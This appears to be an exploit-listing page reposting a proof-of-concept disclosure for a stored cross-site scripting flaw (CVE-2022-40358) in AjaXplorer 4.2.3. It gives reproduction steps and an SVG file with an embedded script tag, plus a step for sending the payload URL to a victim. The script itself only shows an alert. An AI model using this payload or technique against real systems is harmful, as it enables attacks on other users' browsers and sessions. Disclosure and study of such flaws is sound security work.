AjaXplorer 4.2.3 - Stored Cross-Site Scripting (XSS)

CVE Category Price Severity
CVE-2022-40358 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-09-22
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

AjaXplorer 4.2.3 - Stored Cross-Site Scripting (XSS)
# Exploit Title: AjaXplorer 4.2.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage:
# Software Link:
# Version: 4.2.3
# Tested on: Linux, Windows
# CVE : CVE-2022-40358

An issue was discovered in AjaXplorer 4.2.3, allows attackers to cause cross site scripting vulnerabilities via a crafted svg file upload.

Steps to reproduce:

1.Right click > Create a new file > name file xss.svg
2.Right click on file > open in Source Editor
3.Copy paste below Payload and click save

<?xml version="1.0" standalone="no"?><svg width="1000" height="1000" version="1.1" xmlns=""><circle cx="50" cy="50" r="25" stroke="red" fill="transparent" stroke-width="50"/><script type="text/javascript">alert('XSS');</script></svg>

4.Right click file and open in external window for payload URL to send to victim

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.